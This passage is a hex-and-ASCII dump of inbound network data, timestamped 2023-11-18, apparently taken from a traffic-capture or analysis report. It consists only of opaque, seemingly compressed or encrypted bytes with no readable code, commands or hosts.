3e 87 08 76 79 8f 0e Data Ascii: 8G$m]N[2H'YOPM"RRcz:-K8m>-75'3tiB!?U[uQRlZI?7^0 LtS5VCvj\=#*"F5{jCJ]l\&5W!YxQq\0I+GtzzNe?vl(ibb;:xsObuir>vy
2023-11-18 09:02:40 UTC	7804	IN	Data Raw: b3 7e d5 96 55 6b 68 74 69 c6 5a d7 b4 fb 36 e7 7a b1 b4 95 be b1 6a 83 fb f5 56 b7 aa 6c e5 b1 58 1d fd 5b b7 66 cd 94 f3 62 d3 62 f5 75 1b 5a 57 53 a2 6e cd a6 b6 54 eb ba 3a 00 58 dd 9a 1d eb b6 b5 b6 c5 96 0c 34 8a 42 b9 41 36 4d f2 be ef 92 4b af a8 9d bd a4 b6 21 36 ed ec d8 d4 dc d7 06 47 00 ba 3b 37 b5 79 07 60 43 7b 4b cb 75 ad ef 3b 2b 3b 90 9b 53 9b b6 6c 5c 85 27 0c d8 ad 80 cf 8e 36 4f c2 94 e3 9b 72 52 38 78 b9 66 fd ca f4 76 82 ac 35 9b 36 6c a0 1e cb 1d 3a 1d 1b 36 f8 5a db b7 af 6d 5d d7 9a 36 56 54 d4 cd ad 3e 53 fb b6 d5 1d 29 b6 3a 6b df 99 5f e3 06 02 98 85 ab 79 9a f2 80 d1 5c cc e3 89 65 1f 02 9c 57 6d f4 b5 6c df bc 72 5b eb da f4 7a df 4a c6 47 3e 84 2a f3 dd de ba ae 0d 16 83 1b 5a da bc 6d 59 b9 32 3d 7f 6a c3 b9 2b 1b 3c 9f 24 Data Ascii: ~UkhtiZ6zjVlX[fbbuZWSnT:X4BA6MK!6G;7y`C{Ku;+;Sl\'6OrR8xfv56l:6Zm]6VT>S):k_y\eWmlr[zJG>*ZmY2=j+<$
2023-11-18 09:02:40 UTC	7820	IN	Data Raw: 62 5e b8 67 d2 5e be 24 53 47 82 a2 b9 2b 9f 1d 60 c5 09 05 e1 0e 1c 29 c6 14 58 16 89 36 ca 55 53 cd f8 89 c1 b5 aa 83 9d 4e 63 bf e9 b6 e3 ed 72 18 d6 33 69 31 33 4c 2b 5b 97 63 4e d7 d7 e5 5b 9e f5 4c 3a c6 f6 7d 5d be e5 5a cf 24 2f 0b 5f 86 ae ce 6f 53 6b 6e 55 65 ab 1f a9 89 77 23 32 1c af 35 cd 10 b4 b4 b5 18 be 8e 92 f6 e3 66 70 f4 df 49 74 79 0e 78 38 8a f7 3d 45 55 8b aa e5 83 30 54 ce 45 f1 c5 3c 1b c0 be bb fc df 1e 1b 80 3e 3f ca 81 20 6e 70 02 67 b3 a5 47 07 82 d8 e8 04 c2 da b3 2d 4a 8f 00 7e e9 84 1d 54 f4 b0 18 27 04 31 35 c7 06 e2 e5 96 c4 ad fb 62 ee 9e c5 2d c6 09 71 4b bf 2c 6e 31 52 88 db e5 70 b8 3e 65 b8 b0 9f 79 bc 3f 66 86 08 6b 7c 6b 27 a9 0d ac 6d a4 56 3f 7e 0b 2f 79 6f b1 e3 83 35 be 35 94 d4 9a e1 01 68 67 74 b0 c6 b7 56 93 Data Ascii: b^g^$SG+`)X6USNcr3i13L+[cN[L:}]Z$/_oSknUew#25fpItyx8=EU0TE<>? npgG-J~T'15b-qK,n1Rp>ey?fk\|k'mV?~/yo55hgtV
2023-11-18 09:02:40 UTC	7836	IN	Data Raw: eb 51 27 28 5a be 6d 0c 09 6d 65 0a cc b4 34 ea 29 99 9b 51 97 e6 3b 14 d8 0e 1b 5a ed 70 dc d0 b0 d0 f0 a1 f5 d0 1e 03 83 87 86 86 eb 2d 32 77 cc 6c 67 b4 04 db 8b 7f af e7 6a f7 5c 6b b1 33 5b 8b db 73 5b cc 6c 2d 76 79 ad 45 7b 61 6b 29 9d d7 5a b4 17 6e 8d 1e 2f d9 1a e6 9a ee ca 5b d3 c0 98 90 90 e0 a8 fc 7b 9c 1a 0d 37 b0 7b f9 1e a7 be 2a 49 b7 93 fb 8e ba ec 25 c1 4e 33 87 e7 c6 28 fc 7e 51 99 39 6c d3 1f 06 60 89 ba 12 a6 0b 89 43 21 fd 8e 2e 56 3d ea ca 98 87 94 51 27 55 73 28 a3 8e 48 83 ec 65 c6 57 7d 8e b0 97 3d 40 24 fe f8 93 a6 9a 02 f9 83 32 89 85 f4 bb af 58 99 75 90 d1 0e b2 66 f5 a5 6a bc 83 9c ea 28 fe 38 49 f2 73 21 f3 11 a9 a6 3c c4 1f 5f 90 d8 17 d6 8f 88 96 a8 73 bf cd 49 5a 43 4e 91 f4 53 3f 9a 73 92 12 a6 7e a2 e0 24 97 70 9a fa Data Ascii: Q'(Zmme4)Q;Zp-2wlgj\k3[s[l-vyE{ak)Zn/[{7{*I%N3(~Q9l`C!.V=Q'Us(HeW}=@$2Xufj(8Is!<_sIZCNS?s~$p
2023-11-18 09:02:40 UTC	7852	IN	Data Raw: ea 54 d1 3d be a5 76 be 8d d2 4c 71 47 55 12 b9 f6 25 b6 3c f7 13 b9 6e 8d 7c d6 5d 5b 5a 2d ee ae 15 e4 f2 79 6c 97 f8 2f db 1a cf 12 b1 70 f3 e1 1b 44 1a cd 6c 2d fe 40 64 f4 75 d6 65 d8 4d 3d c1 c5 92 a5 bb 05 41 e0 c6 d7 2a 22 76 ae 0d af 26 d2 c0 b5 46 3e 91 23 4b d9 3e b6 8d c8 a5 95 2c b9 8f 88 f4 b5 d5 e8 59 13 91 49 2e 9f 1e 22 61 ae 7d 8e ec 56 8e af df 10 f1 73 69 c2 bb 95 fd 67 41 1d cd 48 5c 4c cf 24 72 37 77 7d b1 92 c8 ba 7e b6 84 79 44 c6 b8 16 db 5c 27 ed 70 27 b5 7c 15 91 d6 c4 d8 c8 a5 30 7b 6a fc bc fd 07 94 e6 43 6e 1d fb 71 22 47 e5 75 6c 57 69 b1 cf 57 59 2a f8 b9 9c 7f 55 a7 ac c5 eb 44 42 a9 dc 99 03 91 09 6e 54 26 ef a1 79 9e 8b ce d9 7b 94 f9 5c 44 e4 67 dc 6f 5c 2e 91 43 5c 6b b8 88 b4 71 b3 fa ae 3d b1 fd 77 a2 33 09 11 13 d7 Data Ascii: T=vLqGU%<n\|][Z-yl/pDl-@dueM=A"v&F>#K>,YI."a}VsigAH\L$r7w}~yD\'p'\|0{jCnq"GulWiWYUDBnT&y{\Dgo\.C\kq=w3
2023-11-18 09:02:40 UTC	7868	IN	Data Raw: 31 69 db f8 51 a7 69 d0 9a b1 79 92 b0 da 16 ec c2 01 30 e6 2f 10 f4 5d 0a d9 4b 12 d6 2e a5 9e bc 35 64 3b 87 1e 4f 10 1f 5e 2b 7b ba e9 5b 5a 0e 74 0b 5f 1f cf 6a e8 ea 68 3c 9f 53 b8 4b b8 ae 5b 5c b7 be 1e b0 2e b9 df 75 64 67 2f a7 ad 2f f0 e9 31 9c 56 57 bf cb fa b2 11 5f 3e f3 1d ec 49 da c1 fa dd 7c 32 dd 30 52 91 76 41 73 82 73 4c 8f b7 f5 a6 3f 60 04 b6 0e 57 48 4c c8 ef d4 17 57 c2 7d 8d ce b9 f4 da a7 42 72 04 e2 76 e8 e5 6c 62 63 16 a7 37 31 fe df 09 0c f1 c6 62 1e ff 92 22 e3 1b 0a c7 a7 f7 85 15 d6 a7 f7 6d e9 5b ea ee c5 b9 7b 54 4b d6 2d f5 a5 85 7d ef 51 25 15 92 fd 99 42 2c f4 05 92 fc eb 22 bc 05 0c 7d 51 a5 74 a7 22 93 b0 65 7f 66 d2 86 e3 ff f1 2e 86 60 f5 1b 38 a2 97 77 5d 32 9c 04 2b 32 0b 0c f3 d5 64 70 91 c4 32 be 82 f2 e0 db 96 Data Ascii: 1iQiy0/]K.5d;O^+{[Zt_jh<SK[\.udg//1VW_>I\|20RvAssL?`WHLW}Brvlbc71b"m[{TK-}Q%B,"}Qt"ef.`8w]2+2dp2
2023-11-18 09:02:40 UTC	7876	IN	Data Raw: 19 8a fb 2f 67 e9 11 59 37 88 9d 25 9f 8b 0f 50 c7 e1 2c d9 41 21 6a 14 92 6c 08 e3 e8 f7 6f c0 d7 33 6c b7 34 ac 9e c3 c2 54 0d 05 3d 39 0a 39 43 d9 be 2b 53 f0 54 d0 4f 63 a5 e1 78 9c cf 8f c4 49 7f 61 ba 91 da 1c 07 9a ef 54 8a 73 0b 93 4c d4 b0 1e 50 c3 69 34 7c d6 ed 3e 59 1e 0d 4b 4c 62 7d 62 d2 7d 02 31 21 79 e4 9d b8 24 89 48 0d 56 91 62 8b 8c 03 1d ce ac 49 5f 45 a4 ff 7b 02 d2 af 8a ab 74 1c 17 67 d3 24 84 d3 71 50 38 1d 00 cd 8c fd c0 fe 2f 4e be ab ed 7e a2 45 25 9b 70 1d 68 a8 e7 c0 38 55 9a 18 e3 77 c1 d2 eb a2 8f 5f 8b a0 83 47 64 e6 65 77 cd c9 ef e3 71 83 90 35 88 c6 74 2e 56 da b1 57 e7 ae 21 e9 bd 73 62 c2 90 1a de 2b d1 90 8a 69 43 6a 50 af 64 1a 52 a3 0d 43 ea 68 02 12 4e ec a5 03 4f 17 30 e6 0b 3c 06 b1 83 9b 21 82 fd ba 9f fd e6 b8 Data Ascii: /gY7%P,A!jlo3l4T=99C+STOcxIaTsLPi4\|>YKLb}b}1!y$HVbI_E{tg$qP8/N~E%ph8Uw_Gdewq5t.VW!sb+iCjPdRChNO0<!
2023-11-18 09:02:40 UTC	7892	IN	Data Raw: 4c a2 c1 f9 e9 8c 4e 4e d9 12 b3 42 43 91 71 b1 17 88 da d1 57 68 b0 c2 12 90 6c c7 79 18 57 12 38 d2 ee cd 47 dd ce 55 70 43 ef cb 47 15 50 2b ab 0c 48 22 17 0f ca e0 0b d5 8f a8 56 36 2d c5 3d 51 18 86 45 8c b0 77 62 8e 6c 24 21 ea 05 dd bb cd dc 3c aa 85 9f b3 9c 0c 99 a0 bf df cb d7 f0 e3 05 51 1c 05 6d 84 32 91 35 73 65 cf bb 65 ff a2 1e 2f 20 db 4b 94 21 15 f3 f1 a0 3f 17 80 c2 8d 26 5a a0 89 b2 fc 14 f9 d5 1f 5a c2 a3 8c 63 e0 82 85 7c b1 65 99 0c 84 9b 23 03 e1 72 e1 48 e8 2d 63 d0 e6 30 11 76 45 ae aa 16 d7 8b 20 57 74 72 d0 28 87 c3 72 a0 71 14 10 8c f1 81 18 2b e7 11 7f 5d 65 27 e2 c9 11 67 7c 40 01 a1 e0 47 e2 15 c6 39 6d a0 49 d4 cb 53 62 57 54 e1 0d d9 f3 43 f8 23 88 e1 90 f1 24 68 82 ff 5a e7 67 f8 21 0a 4b a9 5a 35 3c b2 04 67 f8 e1 a8 dc Data Ascii: LNNBCqWhlyW8GUpCGP+H"V6-=QEwbl$!<Qm25see/ K!?&ZZc\|e#rH-c0vE Wtr(rq+]e'g\|@G9mISbWTC#$hZg!KZ5<g
2023-11-18 09:02:40 UTC	7908	IN	Data Raw: 14 77 fe 12 01 ef fe b9 bf 9f 97 bc 3f 46 0c 6c 6a 39 20 f8 8a 0e fd 77 6c 14 ec f7 9d a5 d4 49 44 da 00 3e ef bb 88 88 cf eb bb 44 c2 4d 3f 5f 5c d8 b2 0f d0 64 b4 90 a9 7b f6 b1 69 29 3a bf 72 c7 be 8b 87 e9 3a 1a 3e 17 50 88 bd 9f b3 60 d0 9f 2f 1b a0 03 5e ff fc e2 46 67 cc 39 ec 06 36 fa 4f 1e a0 f5 a9 85 7a 2a 2c 04 ab 7d ca 37 b4 61 d1 c5 4b 43 8f b3 80 da e8 a8 e0 88 ff fc 17 cc 5c c3 8d 5e 86 6d ce 3c 3a 90 c0 b1 4e ac 3f e1 d4 45 f8 e4 66 53 e8 2e 2f 1b 4b fb 1e df 03 c5 df d6 ef 7f f2 13 3a 0d 68 65 93 c3 ae 09 e0 c7 93 d0 58 55 74 11 c9 d7 fa 11 70 e6 4e 46 3a 87 91 ba 3f a6 f2 35 0f d7 74 6b b7 16 ce b9 c0 6f a9 e5 ed 42 18 73 f5 ae e5 8d b3 47 cf fe 56 e3 ec 65 18 56 b1 b9 c3 23 df 8a f3 c1 67 e9 a2 bb ef f6 3d c1 76 f0 1c 19 e7 5b fe d5 05 Data Ascii: w?Flj9 wlID>DM?_\d{i):r:>P`/^Fg96Oz*,}7aKC\^m<:N?EfS./K:heXUtpNF:?5tkoBsGVeV#g=v[
2023-11-18 09:02:40 UTC	7924	IN	Data Raw: 23 f6 97 a6 38 a3 b9 c4 5c 5a 64 a2 6a dd 38 85 7d c4 19 a7 50 a4 71 6a 79 e1 5c f8 2a d6 99 10 59 ac 43 0c f5 33 4e a1 71 c4 05 db ac 3c 7b 84 41 5d b2 b0 61 61 7c 1b f4 01 5a da 71 09 bd 18 a9 82 c1 55 4d 3d d6 23 f4 65 ae e6 9a 66 bb 13 ad e4 02 90 09 9c 1f cd af a9 b1 b5 a0 a3 0c 62 cc 77 43 a3 85 be 11 0c eb 56 9b ba a4 89 4d c2 d2 6e af 59 cd 77 44 b8 da 67 73 05 be 2a aa 1d 74 9d 45 f8 9e 01 63 d3 86 16 bb 4d 5d 50 df 8c d3 db 64 46 33 ae f4 57 d8 20 a6 26 20 b0 f3 73 f1 a4 ca 66 53 97 bb ea e9 f2 81 4b 3d a3 d9 da 50 db 00 d9 98 09 92 40 3b 5d 62 06 f9 6b 76 54 3b 16 ab 2b 6d d6 06 07 f6 7b b8 23 82 ef bc 70 22 9b e5 f6 0e 08 55 51 bd 18 e7 7b 29 12 48 ad 90 86 63 41 83 d5 6a 6b a2 b1 b3 14 67 30 95 84 1e f9 6c 15 8b 22 19 07 70 56 9c f5 f6 6a e4 Data Ascii: #8\Zdj8}Pqjy\YC3Nq<{A]aa\|ZqUM=#efbwCVMnYwDgstEcM]PdF3W & sfSK=P@;]bkvT;+m{#p"UQ{)HcAjkg0l"pVj
2023-11-18 09:02:40 UTC	7940	IN	Data Raw: 57 56 11 c5 bf af c9 4a 12 3c 9b f0 56 4d c5 73 1a 8c 36 51 58 07 ad 76 d4 d5 10 c5 18 19 5d 02 95 fa b6 12 c5 15 b2 e1 7f a3 b9 39 73 ad 04 b7 88 21 af 92 8d 7c 83 22 bb e9 bf 16 49 70 5b 53 6b 83 03 24 5f 31 95 45 20 f8 2f 0a 20 a6 b3 c0 02 a2 a5 ae b1 c5 05 79 2b 93 5d 26 4d 6a 91 e0 5f 25 1b d1 2d 21 6f 76 b6 d8 ab 5d b8 f1 81 28 e6 c8 46 df 10 27 45 e1 43 6e 8a 5b 82 7d 17 35 34 51 ef 05 03 bc 1b ab 6f 6b 06 44 dd 40 44 43 13 22 ec 0c a1 b2 54 37 2e b0 2f 74 36 dc 41 94 69 a3 90 d3 e3 5c d5 75 05 e5 68 80 4e c5 a9 78 b6 ea 3e f2 c1 a1 47 93 09 51 8b 08 cb 8c 99 a5 e6 12 b4 64 f2 0b 8b f0 26 0b 55 c9 ec 86 26 d4 28 4e 5c 79 b2 b4 6a 2d 3a 4b 8d a5 a1 d6 d9 62 ab 21 c3 ae 1b f9 f9 b5 e1 69 9c 01 9a 09 3c 0d f6 a5 33 9b 16 36 e1 c5 62 97 55 53 29 a3 9e Data Ascii: WVJ<VMs6QXv]9s!\|"Ip[Sk$_1E / y+]&Mj_%-!ov](F'ECn[}54QokD@DC"T7./t6Ai\uhNx>GQd&U&(N\yj-:Kb!i<36bUS)
2023-11-18 09:02:40 UTC	7956	IN	Data Raw: f8 31 35 53 ef fb f2 65 56 55 66 f5 74 d7 d7 df d3 ef 23 c5 0c f8 2a 7e 01 26 a0 8f 10 fa 16 2c 74 1b 1b 6c ea 8f 92 22 8c d4 b4 c3 06 9b fa 63 32 ce ec c0 60 53 df 4a dc 05 60 7d 68 4b 83 4d fd 71 62 9f 06 06 9b 36 36 d8 d4 b7 13 6b 1d 18 6c da 2d 83 4d 7d 87 ec fa 62 1b d9 cb e9 cf c8 e0 06 5b 65 b0 a9 3f 4b d8 1c 30 d8 b4 15 06 9b fa 73 12 bc d6 56 18 6c ea cf 4b f0 46 09 6a fa 0b c4 fd 0d 18 6c da 51 83 4d 7d a7 64 6e f6 10 4d 7f 91 94 2f 04 83 4d db f3 07 d4 5f 22 f5 cb c0 60 d3 f6 0c 36 f5 97 49 ed 2a 30 d8 b4 3d 83 4d fd 15 19 78 d4 0e 19 6c ea af 92 ae e7 84 c1 a6 15 31 d8 d4 af 27 53 fa 0c b8 74 43 60 6f a9 32 d8 a4 0a 83 4d fd 26 52 3c 03 bc 52 5b 53 60 13 29 1d 0d 6e 98 76 2b f3 cd a4 94 11 06 9b 56 d4 60 53 bf 85 18 7f 0f ae 9e 81 c1 a6 be 99 Data Ascii: 15SeVUft#~&,tl"c2`SJ`}hKMqb66kl-M}b[e?K0sVlKFjlQM}dnM/M_"`6I0=Mxl1'StC`o2M&R<R[S`)nv+V`S
2023-11-18 09:02:40 UTC	7972	IN	Data Raw: 62 0c f2 2c 3c f0 d8 7e 3a 8d bd 52 70 3a 45 18 fb 78 33 6e 10 78 4f 0a cd be c2 e0 4b 79 58 39 83 18 97 f1 14 18 54 9d bb b9 5c c8 cb c8 28 de 45 2d 5f 5b 2e 60 e4 0a 09 b1 5d a2 91 e3 07 c6 95 8a 70 d4 83 14 32 3e 22 61 f0 78 03 4f 86 c3 d5 4a 05 af df 8c ab bc f0 5c 71 b8 88 ab 78 bf 84 80 6f 6c 02 fc 9a 04 90 67 3a 04 b9 5a 42 26 b2 73 30 d0 fd ba 64 a6 35 64 e7 e0 80 1c 08 6f 85 48 6c 43 12 90 9e c7 85 64 0d 67 71 11 0e 4b d0 a1 72 b1 5a 22 81 46 64 04 3a 7f d6 12 cb 6b 54 45 ca cf 8b a4 31 4f a1 16 2a 22 e3 a0 a7 ec ac 62 59 a4 1c 52 95 88 48 39 ec 53 9c 22 6b 5c 5d 1b 22 e9 9a 1a 05 2d 32 af 55 17 ba 48 9a a8 d5 74 44 ea a4 4f 33 12 59 47 fc 6a 54 a4 4d f9 d4 ae c8 9a 96 58 27 e8 38 28 92 ae 13 48 b8 17 db 30 1b f8 66 04 1c fa 8d 18 3e 2d e0 87 ca Data Ascii: b,<~:Rp:Ex3nxOKyX9T\(E-_[.`]p2>"axOJ\qxolg:ZB&s0d5doHlCdgqKrZ"Fd:kTE1O*"bYRH9S"k\]"-2UHtDO3YGjTMX'8(H0f>-
2023-11-18 09:02:40 UTC	7988	IN	Data Raw: 08 bd 96 86 63 0f ed 1f 42 c8 9c 21 d8 43 80 71 1d 8d c2 93 fc 72 21 21 3e 48 ce 3a f0 07 e0 ca cb af 24 6b af 25 64 02 24 e7 92 1a cf 62 58 7d 37 70 1b 26 dd 00 c2 d7 23 00 1c d6 3e 24 b3 ad e1 bb b1 84 dc 07 c9 c9 8e 74 a0 c6 21 f5 07 98 5c eb 21 39 e1 3c ab 03 2f bb 09 39 a9 c8 b9 73 02 21 b3 26 20 3a f4 03 3b 29 b1 3f 47 f2 91 18 3e 91 90 df 21 53 0c 11 ab 38 92 0f ca 5a 58 34 4b a7 a0 b1 de 25 a2 4e 3a d2 c7 df 42 88 eb 16 a4 23 29 0f 49 27 e1 f1 10 92 d8 36 e0 a9 87 81 1c 45 6d e8 eb 4c b9 15 26 e2 ad 92 e3 5d da 80 9c 68 e4 78 a6 12 52 34 15 fb 13 4f e1 6a a4 27 33 7a 31 d0 8b 11 be 7e 31 9b 34 a3 68 06 d2 77 95 10 b2 09 92 03 5c 0f 37 6b 0b 1e 80 74 34 9f 03 16 ff 78 07 1b e7 d1 34 fe c1 1c 7c 9e e2 ac ad 0c 72 4a e9 18 3e 53 97 4f 23 a4 09 12 4a Data Ascii: cB!Cqr!!>H:$k%d$bX}7p&#>$t!\!9</9s!& :;)?G>!S8ZX4K%N:B#)I'6EmL&]hxR4Oj'3z1~14hw\7kt4x4\|rJ>SO#J
2023-11-18 09:02:40 UTC	8004	IN	Data Raw: 22 2c fa 44 88 05 08 f9 4d 84 1a 73 0a 62 ac 03 b8 96 f6 2c 21 27 5f 69 93 cc e7 2d 83 89 e4 d9 33 da ec 3b ce f9 bc 59 28 44 81 cf 47 94 34 9e 8a 36 88 02 3f 41 79 fc 69 75 43 5c 81 dc a2 f5 96 61 b4 44 c4 5b 51 c4 9f 0d 66 ca e6 19 64 ff 14 82 0d e9 df 31 a4 18 51 3d 6b 8b 50 76 1b b8 7f ed 02 65 3b 6d 9c f2 21 c3 3d 12 f7 2d e0 2f 08 b7 8c 50 66 42 dd b0 4f 88 3a 04 eb 6a a1 fc d5 60 22 81 b6 00 fc 15 a1 d6 10 2a 9e 7a d9 1e 80 6f 12 6a 2d a1 12 08 95 f5 a9 10 09 08 a3 de 9a 8c 86 84 66 14 7a d0 5d 23 ca 09 83 ea 43 3e 85 9f 81 f2 53 b0 fc e4 53 f2 39 09 60 33 22 8f d3 d6 f9 31 8f 03 6a a2 44 f9 31 48 30 d5 98 bc 0e 09 c6 fe 61 32 d1 28 c3 d5 44 9b 4d b4 af 0d b1 db 02 99 fd 17 d2 fe 0e 61 dc ec 18 2d c7 bd 80 f6 f0 11 88 a2 93 d0 ea 7b 93 84 18 2f 1d Data Ascii: ",DMsb,!'_i-3;Y(DG46?AyiuC\aD[Qfd1Q=kPve;m!=-/PfBO:j`"*zoj-fz]#C>SS9`3"1jD1H0a2(DMa-{/
2023-11-18 09:02:40 UTC	8020	IN	Data Raw: 7f 8e 6a f8 4d 58 c9 6c 07 c7 1c 9a 62 88 be 50 43 7d 58 17 89 2e d8 93 16 ca 7e 3d 4b d9 84 d7 56 61 64 2d 35 85 a8 53 22 2f aa 1f c3 c5 94 8d 65 a9 fe 48 a9 36 a8 1f 27 a2 79 1d 87 70 61 69 1d 3d 18 b4 9f c7 06 ad f2 44 5f bd c2 06 b8 37 cd b9 6c 1e c3 ab 78 75 11 0d fb 0a 58 75 42 f8 58 a5 8f 11 11 41 38 1e 29 11 91 23 22 c2 f0 7a de 30 76 22 92 3d 45 15 31 f8 8b bc e2 d1 a1 61 52 da ff 75 b9 3d 53 4d 1f 5e ca 2b 9d c4 96 d7 29 7f fc a7 76 c6 1b 1d c6 6c 9e fd db 01 fb 14 6d 63 92 f6 31 86 2d af 10 87 07 98 bd d8 1e b0 aa 94 cb 3f b2 54 b7 be 17 62 c4 01 aa 07 6d 0f 34 61 28 89 09 2a 58 da ee e6 d6 a7 11 d3 34 64 37 46 a5 c5 72 99 02 f4 31 1a 34 91 4b a5 52 bc 6f 77 a7 7b b1 9d aa 13 5d a8 bf 8e 21 7d 54 46 08 e9 5e 4a e3 18 cd 50 b6 87 ab 4e d3 a8 bd Data Ascii: jMXlbPC}X.~=KVad-5S"/eH6'ypai=D_7lxuXuBXA8)#"z0v"=E1aRu=SM^+)vlmc1-?Tbm4a(*X4d7Fr14KRow{]!}TF^JPN
2023-11-18 09:02:40 UTC	8036	IN	Data Raw: d7 d5 82 a3 61 b1 ad c3 cb f4 d3 4b 2b e7 32 ef 79 cd bc da 75 e7 f6 86 ce c6 06 bc e9 94 6e 4e 35 b8 68 6b bb fb e8 a8 6d 7b 5a da 9b 32 0c 43 2f cf 01 ca 50 8c fb 68 ca 59 38 00 16 fb 5e e7 7a 3e a1 9e e5 83 9f 61 e1 7a ad 0c 35 21 18 97 e8 27 77 6a a0 e3 a3 b9 f3 c9 b7 a3 88 4e 61 47 b9 f1 46 6d 5f fc 24 6f 93 15 ad d6 90 cc b3 92 00 68 73 52 32 20 6e c1 85 d6 54 52 e0 75 0c e8 8a 7a 59 bd 03 90 85 d2 92 81 db e4 45 6d 42 9f 50 77 5c 3f bc 92 b6 2f de 7c 86 18 9f de c1 a9 c4 54 73 2e 1f c1 18 30 af 2c 96 fe b5 80 3c c0 75 3e d7 8d ad 3c ef 09 43 7c 19 9d 88 79 f5 80 73 74 7a 21 6b 17 5b 06 f8 68 70 00 cd 42 56 2e 5d 66 45 9c 4b 00 f3 a7 48 63 6e 4c e6 f7 91 d8 36 81 be 9b fd 0f 43 ed d2 30 af 28 89 aa 3a be 1e 9d ec b8 d3 a6 49 e3 66 39 ed dd 48 25 a6 Data Ascii: aK+2yunN5hkm{Z2C/PhY8^z>az5!'wjNaGFm_$ohsR2 nTRuzYEmBPw\?/\|Ts.0,<u><C\|ystz!k[hpBV.]fEKHcnL6C0(:If9H%
2023-11-18 09:02:40 UTC	8052	IN	Data Raw: f4 b2 c8 03 1e 16 c2 e1 fa d2 65 bc 1b 9b 98 70 a3 12 ff 7d 4d 4e 94 bf 12 05 ff 6f 3f d9 21 60 46 97 7a d6 0a e4 31 9c 21 06 30 27 d7 4f 71 ef 39 e8 c6 46 a6 c9 e8 c8 49 e5 96 18 8c c4 26 66 9a b2 8a 07 23 b1 8a 99 a6 ec e2 c1 48 54 09 d3 54 9f 1b 8c 44 b3 30 4d 49 e4 60 24 b6 31 d3 94 75 3c 18 89 75 cc b4 1d 67 b8 41 73 30 9a ea 07 cd 41 2d 98 83 6e 04 e5 ab 94 9c 0e 3a 4f 27 d3 d4 2a e7 a0 13 5b 9b 10 83 99 0b 2a 93 79 30 12 93 99 69 2b e7 bb f1 77 50 79 3c 4c 62 b1 f7 91 0f 46 a2 12 f9 2a 51 8a 9c 54 dd 61 30 12 2b 9a 69 ca 8e 1e 74 03 34 d3 80 fe 5c 68 af fa 9e 33 e8 06 6c 2e e8 7a cd e4 e4 ac c4 c4 ce ae 17 4b 2b 16 a4 bd 11 9a f6 3b 40 d2 8d 6e 22 9f 16 ab ca a0 7e 50 4e 8b e9 64 d0 ce 7a 31 58 d3 62 14 19 54 4c 22 83 7a 2b 35 ed 47 e1 ec 7a 3f 0a Data Ascii: ep}MNo?!`Fz1!0'Oq9FI&f#HTTD0MI`$1u<ugAs0A-n:O'[y0i+wPy<LbF*QTa0+it4\h3l.zK+;@n"~PNdz1XbTL"z+5Gz?
2023-11-18 09:02:40 UTC	8068	IN	Data Raw: 3d 99 ac 0e e5 fd 58 0b 29 d3 f0 8c b6 ff e9 20 a4 4d 20 dd b4 8f 12 c8 bb 74 ab 56 2d 19 a5 0e 1e d0 92 d8 95 e4 aa 27 90 cb 08 69 16 c8 12 42 7a 05 92 4f 48 e1 b3 8c 60 12 5e 8c 99 5a aa 32 c2 24 94 9a 68 4d 3d af f3 b1 e8 1d 64 9c 60 98 04 c7 2c 96 84 31 69 ef f7 62 02 eb fd 32 a5 df 1f 4c b6 84 bf c2 96 5a d8 15 76 82 22 c3 44 dd cf 13 b5 2e 4e 3a 6f c3 7b c8 3b a4 a9 eb 30 d3 43 c6 b0 1e b2 3e f0 4d 3c 4c e6 7d 3c 99 b9 b7 14 b9 b7 f9 56 64 88 d9 dc b9 92 2e 89 14 62 4e 6f 9b af 9a 44 da af 1c d4 27 41 25 54 1d fb b9 68 27 61 c3 5c 6b 20 09 a3 8a ac 4f 50 e6 84 ef 13 5c 96 f0 d7 b8 9e f9 cc c1 1f 1a f6 1b d4 9d 1e 13 ee 14 c7 32 77 d2 40 8b b9 f3 58 9c 7c b6 99 9d fb d2 64 76 ee 8b 02 f7 6f 78 ee cb f8 b9 27 52 64 78 5e 6b 16 b0 f3 ba 0b ce 8b 79 ea Data Ascii: =X) M tV-'iBzOH`^Z2$hM=d`,1ib2LZv"D.N:o{;0C>M<L}<Vd.bNoD'A%Th'a\k OP\2w@X\|dvox'Rdx^ky
2023-11-18 09:02:40 UTC	8084	IN	Data Raw: 0d b0 c0 10 42 93 f0 c1 d6 1d 1e f4 64 21 4b 43 1b 40 d0 bf 6d b3 c3 30 d5 5a 1f c5 89 7a 3b 7c b6 d6 7b 68 5c 09 9f 9d be 0a 85 03 6f df 0a bc 41 b0 9a 0e 94 0c 5f 05 28 f3 d1 b0 73 73 18 8c 63 3a a0 74 df 67 1f d5 08 df 90 6a d1 b7 ba 8d 93 72 94 f3 67 7b 25 7e db bd 1b f6 6e d8 1b 6f af b2 31 8e a5 b5 3e 8d 8c d7 57 98 48 ff f3 45 85 f1 97 ee 60 74 2a 60 9f 24 21 15 0b a4 3b d8 e5 d3 db 69 c2 dd 7f 9b 65 85 1d 56 cc 80 87 60 d8 a3 6b 49 03 fe 63 30 e3 a5 81 d1 90 34 2e b6 1b 0d 0e e3 5c fa 9c 5f 09 16 ed d0 e7 7a ed 14 73 24 0a 05 16 cc 96 28 50 a2 84 62 2a 0d 9c 9b 7d 6a 30 6a 6b 0e fb 47 13 78 25 88 f0 09 2f 84 4c 0c 59 76 02 41 a1 9e b3 54 72 34 09 93 78 f4 93 b7 49 8a 1c e9 00 88 13 91 3a ef 2b 24 c1 59 42 82 5f 15 91 e0 9a e3 50 82 03 86 cf 3e 18 Data Ascii: Bd!KC@m0Zz;\|{h\oA_(ssc:tgjrg{%~no1>WHE`t`$!;ieV`kIc04.\_zs$(Pb}j0jkGx%/LYvATr4xI:+$YB_P>
2023-11-18 09:02:40 UTC	8100	IN	Data Raw: 98 15 a5 1d 86 08 f8 86 78 c1 e2 28 b5 1c 7d 8c 8b 84 84 2c cc 40 19 5b 7d f4 2c 79 cf ea ad 14 f0 35 7b 95 94 57 6d 12 ed 66 65 3c 5a 9e c7 19 45 50 d5 2f 04 6d fa 85 23 2e 7a 38 95 8a dc 21 37 8b 3d f2 5f 51 df 9c 22 32 5c 98 61 b1 96 11 58 12 5c ef a8 e6 13 1f 6c 01 f7 18 b6 cc 91 ef 99 a6 f0 4d 8e d5 98 df 2e 0f b8 cd 8f a2 17 aa 68 60 72 ee aa d6 d3 48 2d ad 9c 89 39 79 91 e7 7b b0 9f 94 d7 39 e8 f7 bb 50 dd 32 3a 2f 02 61 89 22 74 0a c2 c7 34 a4 b8 e5 72 a0 cd d4 02 1c 58 a8 9f 94 77 19 43 f8 27 dc 86 d2 56 45 ac 1d e1 ec d9 98 d5 4b 29 df ae cd 7f 81 5c ae 4c 40 52 6d f5 2a ea 5f b8 83 26 